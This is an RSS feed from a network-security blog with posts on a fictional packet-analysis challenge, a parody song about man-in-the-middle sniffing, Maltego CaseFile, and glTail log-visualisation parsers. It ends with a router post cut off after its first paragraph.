<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>wirewatcher</title>
	<atom:link href="http://wirewatcher.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://wirewatcher.wordpress.com</link>
	<description>Looking beyond the obvious</description>
	<lastBuildDate>Tue, 24 Jan 2012 16:00:46 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='wirewatcher.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>wirewatcher</title>
		<link>http://wirewatcher.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://wirewatcher.wordpress.com/osd.xml" title="wirewatcher" />
	<atom:link rel='hub' href='http://wirewatcher.wordpress.com/?pushpress=hub'/>
		<item>
		<title>The Spy Hunter, Part III</title>
		<link>http://wirewatcher.wordpress.com/2012/01/24/the-spy-hunter-part-iii/</link>
		<comments>http://wirewatcher.wordpress.com/2012/01/24/the-spy-hunter-part-iii/#comments</comments>
		<pubDate>Tue, 24 Jan 2012 15:42:12 +0000</pubDate>
		<dc:creator>Alec Waters</dc:creator>
				<category><![CDATA[Packet Challenge]]></category>
		<category><![CDATA[Spy Hunter]]></category>

		<guid isPermaLink="false">http://wirewatcher.wordpress.com/?p=1496</guid>
		<description><![CDATA[From the mission brief: Operation CHASTISE – Strategic Aims Subvert NybbleComms’ next missile test, replacing the inert test warhead with a live one and targeting the BATCAVE. The net effect will be the physical destruction of SIBHOD, and the discrediting of arch-rival NybbleComms as a business competitor for allowing a test firing to go so [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wirewatcher.wordpress.com&amp;blog=7642208&amp;post=1496&amp;subd=wirewatcher&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>From the mission brief:</p>
<p><strong><em>Operation CHASTISE – Strategic Aims</em></strong><br />
<em>Subvert NybbleComms’ next missile test, replacing the inert test warhead with a live one and targeting the BATCAVE. The net effect will be the physical destruction of SIBHOD, and the discrediting of arch-rival NybbleComms as a business competitor for allowing a test firing to go so badly wrong&#8230; </em></p>
<p>Yellow Sun Heavy Industries have been playing catchup ever since Donald Burgess was recruited by the Sinister Icy Black Hand Of Death. Now, at last, a chance has arisen to strike decisively and put an end to Yellow Sun&#8217;s two biggest threats. Do you have the skills to carry out the mission successfully? <a href="http://ismellpackets.com/2012/01/24/the-spy-hunter-3-packet-challenge/" target="_blank">Click here to find out!</a></p>
<h2 style="text-align:left;">PS&#8230;</h2>
<p><a href="http://www.justgiving.com/alecwaters" target="_blank"><img class=" alignright" style="border-color:initial;border-style:initial;" title="Sponsor Alec!" src="http://www.justgiving.com/App_Themes/JustGiving/images/badges/badge9.gif" alt="Sponsor Alec!" width="120" height="90" /></a> I hope you have fun with these challenges; I certainly have fun creating them. If you were wondering how you could possibly say &#8220;thankyou&#8221;, I&#8217;m running the <a href="http://brightonhalfmarathon.com/" target="_blank">2012 Brighton Half Marathon</a> in aid of <a href="http://www.helpforheroes.org.uk/" target="_blank">Help for Heroes</a> &#8211; please sponsor me if you can by clicking the link to the right:</p>
<p><img class="alignleft size-full wp-image-841" title="hr" src="http://wirewatcher.files.wordpress.com/2010/05/hr.png?w=450" alt=""   /><br />
<a href="http://www.dataline.co.uk/wirewatcher" target="_blank"><img class="alignleft size-full wp-image-844" title="Dataline" src="http://wirewatcher.files.wordpress.com/2010/05/dl.gif?w=450" alt=""   /></a>Alec Waters is responsible for all things security at <a href="http://www.dataline.co.uk/wirewatcher" target="_blank">Dataline Software</a>, and can be emailed at alec.waters@dataline.co.uk<br />
<img class="alignleft size-full wp-image-841" title="hr" src="http://wirewatcher.files.wordpress.com/2010/05/hr.png?w=450" alt=""   /></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/wirewatcher.wordpress.com/1496/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/wirewatcher.wordpress.com/1496/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/wirewatcher.wordpress.com/1496/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/wirewatcher.wordpress.com/1496/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/wirewatcher.wordpress.com/1496/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/wirewatcher.wordpress.com/1496/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/wirewatcher.wordpress.com/1496/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/wirewatcher.wordpress.com/1496/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/wirewatcher.wordpress.com/1496/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/wirewatcher.wordpress.com/1496/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/wirewatcher.wordpress.com/1496/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/wirewatcher.wordpress.com/1496/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/wirewatcher.wordpress.com/1496/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/wirewatcher.wordpress.com/1496/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wirewatcher.wordpress.com&amp;blog=7642208&amp;post=1496&amp;subd=wirewatcher&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://wirewatcher.wordpress.com/2012/01/24/the-spy-hunter-part-iii/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/5efdd6f003184226545199f69c4d5b10?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">alecwaters</media:title>
		</media:content>

		<media:content url="http://www.justgiving.com/App_Themes/JustGiving/images/badges/badge9.gif" medium="image">
			<media:title type="html">Sponsor Alec!</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2010/05/hr.png" medium="image">
			<media:title type="html">hr</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2010/05/dl.gif" medium="image">
			<media:title type="html">Dataline</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2010/05/hr.png" medium="image">
			<media:title type="html">hr</media:title>
		</media:content>
	</item>
		<item>
		<title>Man-In-The-Middle-ing You</title>
		<link>http://wirewatcher.wordpress.com/2011/12/22/man-in-the-middle-ing-you/</link>
		<comments>http://wirewatcher.wordpress.com/2011/12/22/man-in-the-middle-ing-you/#comments</comments>
		<pubDate>Thu, 22 Dec 2011 17:55:49 +0000</pubDate>
		<dc:creator>Alec Waters</dc:creator>
				<category><![CDATA[Silly]]></category>

		<guid isPermaLink="false">http://wirewatcher.wordpress.com/?p=1476</guid>
		<description><![CDATA[Down at the local wi-fi equipped coffee shop, I couldn&#8217;t help but notice the chap in the corner singing merrily to himself as he tapped away at his laptop. Not sure what he was up to, but this was what he sang&#8230; Well I know just why I came here tonight, Drinking coffee while I&#8217;m [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wirewatcher.wordpress.com&amp;blog=7642208&amp;post=1476&amp;subd=wirewatcher&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Down at the local wi-fi equipped coffee shop, I couldn&#8217;t help but notice the chap in the corner singing merrily to himself as he tapped away at his laptop. Not sure what he was up to, but this was what he sang&#8230;</p>
<p style="text-align:center;">Well I know just why I came here tonight,<br />
Drinking coffee while I&#8217;m stealing your bytes,<br />
Sniffing passwords as they fly through the air,<br />
And your privacy, it don&#8217;t have a prayer,<br />
Bob to the left of me,<br />
Alice to the right, here I am,<br />
Man in the middle-ing you.</p>
<p style="text-align:center;">Yes I&#8217;m thinking &#8217;bout which tool I should use,<br />
Maybe <a href="http://intrepidusgroup.com/insight/mallory/" target="_blank">Mallory</a> or <a href="http://www.theta44.org/karma/" target="_blank">Karma</a> for you,<br />
It&#8217;s so hard to keep this smile from my face,<br />
Taking control, yeah, I&#8217;m all over the place,<br />
Banks to the left of me,<br />
Email to the right, here I am,<br />
Man in the middle-ing you.</p>
<p style="text-align:center;">Well I started out with nothing,<br />
And ID theft is my secret plan,<br />
Your credentials all come crawlin,<br />
Wanting to be used they say,<br />
Please&#8230; Please&#8230;</p>
<p style="text-align:center;">Trying to make some use of it all,<br />
Finding pics for &#8220;you&#8221; to post on your Wall,<br />
Maybe sending some embarrassing Tweets,<br />
Social media was never so sweet!<br />
Twitter to the left of me,<br />
Facebook to the right, here I am,<br />
Man in the middle-ing you.</p>
<p style="text-align:center;">Well I started out with nothing,<br />
And ID theft is my secret plan,<br />
Your credentials all come crawlin,<br />
Wanting to be used they say,<br />
Please&#8230; Please&#8230;</p>
<p style="text-align:center;">Well I know just why I came here tonight,<br />
Drinking coffee while I&#8217;m stealing your bytes,<br />
Sniffing passwords as they fly through the air,<br />
And your privacy, it don&#8217;t have a prayer,<br />
Bob to the left of me,<br />
Alice to the right, here I am,<br />
Man in the middle-ing you,<br />
Yes I&#8217;m man in the middle-ing  you,<br />
Man in the middle-ing you.</p>
<p><img class="alignleft size-full wp-image-841" title="hr" src="http://wirewatcher.files.wordpress.com/2010/05/hr.png?w=450" alt=""   /><br />
<a href="http://www.dataline.co.uk/wirewatcher" target="_blank"><img class="alignleft size-full wp-image-844" title="Dataline" src="http://wirewatcher.files.wordpress.com/2010/05/dl.gif?w=450" alt=""   /></a>Alec Waters is responsible for all things security at <a href="http://www.dataline.co.uk/wirewatcher" target="_blank">Dataline Software</a>, and can be emailed at alec.waters@dataline.co.uk<br />
<img class="alignleft size-full wp-image-841" title="hr" src="http://wirewatcher.files.wordpress.com/2010/05/hr.png?w=450" alt=""   /></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/wirewatcher.wordpress.com/1476/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/wirewatcher.wordpress.com/1476/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/wirewatcher.wordpress.com/1476/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/wirewatcher.wordpress.com/1476/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/wirewatcher.wordpress.com/1476/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/wirewatcher.wordpress.com/1476/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/wirewatcher.wordpress.com/1476/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/wirewatcher.wordpress.com/1476/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/wirewatcher.wordpress.com/1476/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/wirewatcher.wordpress.com/1476/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/wirewatcher.wordpress.com/1476/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/wirewatcher.wordpress.com/1476/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/wirewatcher.wordpress.com/1476/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/wirewatcher.wordpress.com/1476/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wirewatcher.wordpress.com&amp;blog=7642208&amp;post=1476&amp;subd=wirewatcher&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://wirewatcher.wordpress.com/2011/12/22/man-in-the-middle-ing-you/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/5efdd6f003184226545199f69c4d5b10?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">alecwaters</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2010/05/hr.png" medium="image">
			<media:title type="html">hr</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2010/05/dl.gif" medium="image">
			<media:title type="html">Dataline</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2010/05/hr.png" medium="image">
			<media:title type="html">hr</media:title>
		</media:content>
	</item>
		<item>
		<title>Using Maltego CaseFile to map The Spy Hunter</title>
		<link>http://wirewatcher.wordpress.com/2011/12/02/using-maltego-casefile-to-map-the-spy-hunter/</link>
		<comments>http://wirewatcher.wordpress.com/2011/12/02/using-maltego-casefile-to-map-the-spy-hunter/#comments</comments>
		<pubDate>Fri, 02 Dec 2011 15:36:04 +0000</pubDate>
		<dc:creator>Alec Waters</dc:creator>
				<category><![CDATA[Spy Hunter]]></category>

		<guid isPermaLink="false">http://wirewatcher.wordpress.com/?p=1467</guid>
		<description><![CDATA[In any investigation, keeping track of evidence is crucial to success. When it comes to crime scene photos, bios of suspects, pictures of exhibits, etc, you might like to follow the lead of TV cops and pin it all to a board in the squad room: Or you might like to use one of those [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wirewatcher.wordpress.com&amp;blog=7642208&amp;post=1467&amp;subd=wirewatcher&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>In any investigation, keeping track of evidence is crucial to success. When it comes to crime scene photos, bios of suspects, pictures of exhibits, etc, you might like to follow the lead of TV cops and pin it all to a board in the squad room:</p>
<div class="wp-caption aligncenter" style="width: 455px"><img title="Doctor Reid and his gigantic sliding tile puzzle" src="http://images.starpulse.com/Photos/Previews/Criminal-Minds-tv-34.jpg" alt="" width="445" height="360" /><p class="wp-caption-text">Doctor Reid and his gigantic sliding tile puzzle</p></div>
<p>Or you might like to use one of those new-fangled computer thingies instead. <a href="http://www.paterva.com" target="_blank">Paterva</a> (of <a href="http://www.paterva.com/web5/client/overview.php" target="_blank">Maltego</a> fame) have recently released a beta of their latest effort, <a href="http://maltego.blogspot.com/2011/11/maltego-casefile-beta-released.html" target="_blank">CaseFile</a>:</p>
<blockquote><p>CaseFile is aimed at analysts that do not necessarily use open sources of intelligence (or even the Internet for that matter). Think of it as Maltego without transforms but with tons of new features. Adding/attaching photos, documents and annotations to nodes, graph merging, better integration with browsers, passwords on graphs, and tons of new useful entities &#8211; and this is just a few of the goodies we&#8217;ve added into CaseFile.</p></blockquote>
<p>I thought I&#8217;d test it out by creating a graph of the players in my Spy Hunter packet challenges (<a title="Packet Challenge – The Spy Hunter" href="http://wirewatcher.wordpress.com/2010/08/23/packet-challenge-the-spy-hunter/" target="_blank">Part One</a>, <a title="The Spy Hunter, Part II" href="http://wirewatcher.wordpress.com/2011/07/13/the-spy-hunter-part-ii/" target="_blank">Part Two</a>). Here&#8217;s what I came up with:</p>
<p><a href="http://wirewatcher.files.wordpress.com/2011/12/spyhuntercasefile1.png"><img class="aligncenter size-full wp-image-1468" title="SpyhunterCaseFile1" src="http://wirewatcher.files.wordpress.com/2011/12/spyhuntercasefile1.png?w=450&#038;h=360" alt="" width="450" height="360" /></a></p>
<p>The graph above shows SIBHOD on the right, and the target organisations on the left. SIBHOD&#8217;s infiltrations are either via its own agents (e.g. Kerry Nitpick using the alias Arnold Davies placed directly within NybbleComms) or via subverting employees (e.g. Donald Burgess). SIBHOD&#8217;s organisational structure is shown via the &#8220;Reports to&#8221; links; also shown are aliases and social network identities. The people are of different types &#8211; Dave Nice is a Gang Leader, Kerry Nitpick is a Gang Member, Donald Burgess is an Employee, etc.</p>
<p>Each element on the graph can have lots of information attached. For example, double clicking on the Silky Suzy &#8220;Alias&#8221; icon shows you this:</p>
<p><a href="http://wirewatcher.files.wordpress.com/2011/12/spyhuntercasefile2.png"><img class="aligncenter size-full wp-image-1469" title="SpyhunterCaseFile2" src="http://wirewatcher.files.wordpress.com/2011/12/spyhuntercasefile2.png?w=450&#038;h=404" alt="" width="450" height="404" /></a></p>
<p>You can attach as many arbitrary files and notes as you like. I did try putting notes on the links (to document what an agent&#8217;s mission is, for example), but these don&#8217;t seem to get saved properly (bug in the beta?). Links to external sites are possible, too &#8211; double click Homer Hicks&#8217; Twitter affiliation, and click &#8220;Open all URLs&#8221; in the top right to be taken directly to his Twitter feed:</p>
<p><a href="http://wirewatcher.files.wordpress.com/2011/12/spyhuntercasefile3.png"><img class="aligncenter size-full wp-image-1471" title="SpyhunterCaseFile3" src="http://wirewatcher.files.wordpress.com/2011/12/spyhuntercasefile3.png?w=450&#038;h=404" alt="" width="450" height="404" /></a></p>
<p>It&#8217;s extremely cool. Download CaseFile from <a href="http://maltego.blogspot.com/2011/11/maltego-casefile-beta-released.html" target="_blank">here</a> (watch the video too), and the Spy Hunter graph from <a href="http://www.wirewatcher.net/spyhunter/spyhunter.mtgx" target="_blank">here</a>, then have a play around!</p>
<p><img class="alignleft size-full wp-image-841" title="hr" src="http://wirewatcher.files.wordpress.com/2010/05/hr.png?w=450" alt=""   /><br />
<a href="http://www.dataline.co.uk/wirewatcher" target="_blank"><img class="alignleft size-full wp-image-844" title="Dataline" src="http://wirewatcher.files.wordpress.com/2010/05/dl.gif?w=450" alt=""   /></a>Alec Waters is responsible for all things security at <a href="http://www.dataline.co.uk/wirewatcher" target="_blank">Dataline Software</a>, and can be emailed at alec.waters@dataline.co.uk<br />
<img class="alignleft size-full wp-image-841" title="hr" src="http://wirewatcher.files.wordpress.com/2010/05/hr.png?w=450" alt=""   /></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/wirewatcher.wordpress.com/1467/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/wirewatcher.wordpress.com/1467/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/wirewatcher.wordpress.com/1467/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/wirewatcher.wordpress.com/1467/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/wirewatcher.wordpress.com/1467/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/wirewatcher.wordpress.com/1467/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/wirewatcher.wordpress.com/1467/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/wirewatcher.wordpress.com/1467/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/wirewatcher.wordpress.com/1467/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/wirewatcher.wordpress.com/1467/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/wirewatcher.wordpress.com/1467/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/wirewatcher.wordpress.com/1467/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/wirewatcher.wordpress.com/1467/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/wirewatcher.wordpress.com/1467/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wirewatcher.wordpress.com&amp;blog=7642208&amp;post=1467&amp;subd=wirewatcher&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://wirewatcher.wordpress.com/2011/12/02/using-maltego-casefile-to-map-the-spy-hunter/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/5efdd6f003184226545199f69c4d5b10?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">alecwaters</media:title>
		</media:content>

		<media:content url="http://images.starpulse.com/Photos/Previews/Criminal-Minds-tv-34.jpg" medium="image">
			<media:title type="html">Doctor Reid and his gigantic sliding tile puzzle</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2011/12/spyhuntercasefile1.png" medium="image">
			<media:title type="html">SpyhunterCaseFile1</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2011/12/spyhuntercasefile2.png" medium="image">
			<media:title type="html">SpyhunterCaseFile2</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2011/12/spyhuntercasefile3.png" medium="image">
			<media:title type="html">SpyhunterCaseFile3</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2010/05/hr.png" medium="image">
			<media:title type="html">hr</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2010/05/dl.gif" medium="image">
			<media:title type="html">Dataline</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2010/05/hr.png" medium="image">
			<media:title type="html">hr</media:title>
		</media:content>
	</item>
		<item>
		<title>glTail parsers for Snort, net-entropy and viewssld</title>
		<link>http://wirewatcher.wordpress.com/2011/10/28/gltail-parsers-for-snort-net-entropy-and-viewssld/</link>
		<comments>http://wirewatcher.wordpress.com/2011/10/28/gltail-parsers-for-snort-net-entropy-and-viewssld/#comments</comments>
		<pubDate>Fri, 28 Oct 2011 14:22:11 +0000</pubDate>
		<dc:creator>Alec Waters</dc:creator>
				<category><![CDATA[net-entropy]]></category>
		<category><![CDATA[NSM]]></category>

		<guid isPermaLink="false">http://wirewatcher.wordpress.com/?p=1437</guid>
		<description><![CDATA[glTail is a tool for realtime log visualisation, which according to the website allows you to &#8220;view real-time data and statistics from any logfile on any server with SSH, in an intuitive and entertaining way.&#8221; glTail can read from any text logfile you like, and via a set of parsers can extract information such as IP addresses for [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wirewatcher.wordpress.com&amp;blog=7642208&amp;post=1437&amp;subd=wirewatcher&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.fudgie.org/" target="_blank">glTail</a> is a tool for realtime log visualisation, which according to the website allows you to &#8220;view real-time data and statistics from any logfile on any server with SSH, in an intuitive and entertaining way.&#8221;</p>
<p>glTail can read from any text logfile you like, and via a set of parsers can extract information such as IP addresses for graphical display. Each row from the logfile may trigger several blobs, e.g. source IP, dest IP, etc, as you can see in the video below:</p>
<span style="text-align:center; display: block;"><a href="http://wirewatcher.wordpress.com/2011/10/28/gltail-parsers-for-snort-net-entropy-and-viewssld/"><img src="http://img.youtube.com/vi/RCa2sjyrUdQ/2.jpg" alt="" /></a></span>
<p>I&#8217;ve written some parsers for <a href="http://www.snort.org/" target="_blank">Snort</a>, <a href="http://wirewatcher.wordpress.com/category/net-entropy/" target="_blank">net-entropy</a> and <a title="Eyesight to the Blind – SSL Decryption for Network Monitoring" href="http://wirewatcher.wordpress.com/2011/06/28/eyesight-to-the-blind-ssl-decryption-for-network-monitoring/" target="_blank">viewssld</a>. A screenshot of them all in action is shown below (click for full size view):</p>
<p><a href="http://wirewatcher.files.wordpress.com/2011/10/gltail1.png"><img class="aligncenter size-full wp-image-1436" title="gltail" src="http://wirewatcher.files.wordpress.com/2011/10/gltail1.png?w=450&#038;h=312" alt="" width="450" height="312" /></a>The red blobs are related to Snort, cyan ones to net-entropy, and the yellow shades are from viewssld. The numeric columns show the rate at which each item is appearing, and the length of the coloured highlight bars show the proportion of occurences of a given item relative to the others.</p>
<p>The parser files and a sample config.yaml file that uses them can be found <a title="Supplemental Files" href="http://wirewatcher.wordpress.com/supplemental-files/" target="_blank">here</a> (snort.rb, net-entropy.rb, viewssld.rb and config.yaml).</p>
<h2>Useful?</h2>
<p>So, it&#8217;s a pretty visualisation of interesting stuff, but is it useful and actionable? It&#8217;s certainly hopeless for correlation &#8211; when a signature fires, it&#8217;s more or less impossible to tell the associated IP addresses and ports even if you have a very quiet sensor. At the other end of the scale, if you&#8217;re inundated with blobs you can alter the regexes in snort.rb to match on a specific IP/protocol/signature etc to be a little more selective.</p>
<p>Where I think this may prove most useful is when you&#8217;re learning from an incident. If you&#8217;ve investigated an incident where someone compromised your webserver, you could pull all the relevant log entries that show:</p>
<ul>
<li>Snort alerts (when the attacker was probing for vulnerabilities)</li>
<li>Apache/IIS log entries (showing everything else they did to your server)</li>
<li>net-entropy logs (showing the attacker&#8217;s outbound backdoor SSH tunnel).</li>
</ul>
<p>If you were to pump all of these logs through gltail you&#8217;d have an effective visualisation of the attack. For inspiration, <a href="http://dataviz.com.au/blog/Visualizing_VOIP_attacks.html" target="_blank">check this out</a>:</p>
<div class='embed-vimeo' style='text-align:center;'><iframe src='http://player.vimeo.com/video/19997906' width='400' height='300' frameborder='0'></iframe></div>
<p><img class="alignleft size-full wp-image-841" title="hr" src="http://wirewatcher.files.wordpress.com/2010/05/hr.png?w=450" alt=""   /><br />
<a href="http://www.dataline.co.uk/wirewatcher" target="_blank"><img class="alignleft size-full wp-image-844" title="Dataline" src="http://wirewatcher.files.wordpress.com/2010/05/dl.gif?w=450" alt=""   /></a>Alec Waters is responsible for all things security at <a href="http://www.dataline.co.uk/wirewatcher" target="_blank">Dataline Software</a>, and can be emailed at alec.waters@dataline.co.uk<br />
<img class="alignleft size-full wp-image-841" title="hr" src="http://wirewatcher.files.wordpress.com/2010/05/hr.png?w=450" alt=""   /></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/wirewatcher.wordpress.com/1437/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/wirewatcher.wordpress.com/1437/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/wirewatcher.wordpress.com/1437/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/wirewatcher.wordpress.com/1437/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/wirewatcher.wordpress.com/1437/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/wirewatcher.wordpress.com/1437/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/wirewatcher.wordpress.com/1437/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/wirewatcher.wordpress.com/1437/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/wirewatcher.wordpress.com/1437/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/wirewatcher.wordpress.com/1437/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/wirewatcher.wordpress.com/1437/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/wirewatcher.wordpress.com/1437/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/wirewatcher.wordpress.com/1437/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/wirewatcher.wordpress.com/1437/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wirewatcher.wordpress.com&amp;blog=7642208&amp;post=1437&amp;subd=wirewatcher&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://wirewatcher.wordpress.com/2011/10/28/gltail-parsers-for-snort-net-entropy-and-viewssld/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/5efdd6f003184226545199f69c4d5b10?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">alecwaters</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2011/10/gltail1.png" medium="image">
			<media:title type="html">gltail</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2010/05/hr.png" medium="image">
			<media:title type="html">hr</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2010/05/dl.gif" medium="image">
			<media:title type="html">Dataline</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2010/05/hr.png" medium="image">
			<media:title type="html">hr</media:title>
		</media:content>
	</item>
		<item>
		<title>A Tale of Two Routers</title>
		<link>http://wirewatcher.wordpress.com/2011/09/14/a-tale-of-two-routers/</link>
		<comments>http://wirewatcher.wordpress.com/2011/09/14/a-tale-of-two-routers/#comments</comments>
		<pubDate>Wed, 14 Sep 2011 14:22:33 +0000</pubDate>
		<dc:creator>Alec Waters</dc:creator>
				<category><![CDATA[Cisco]]></category>
		<category><![CDATA[NSM]]></category>

		<guid isPermaLink="false">http://wirewatcher.wordpress.com/?p=1394</guid>
		<description><![CDATA[Take a look at the diagram below, showing two (Cisco) routers. HugeCorpCoreRouter is a mighty behemoth with a six figure price tag. It has redundant route processors, handles many gigabits per second of business-critical traffic, has all sorts of esoteric connections and requires a squad of elite ninja black-ops CCIEs to keep it all running. [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wirewatcher.wordpress.com&amp;blog=7642208&amp;post=1394&amp;subd=wirewatcher&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Take a look at the diagram below, showing two (Cisco) routers. HugeCorpCoreRouter is a mighty behemoth with a six figure price tag. It has redundant route processors, handles many gigabits per second of business-critical traffic, has all sorts of esoteric connections and requires a squad of elite ninja black-ops <a href="http://www.cisco.com/web/learning/le3/ccie/index.html" target="_blank">CCIEs</a> to keep it all running.</p>
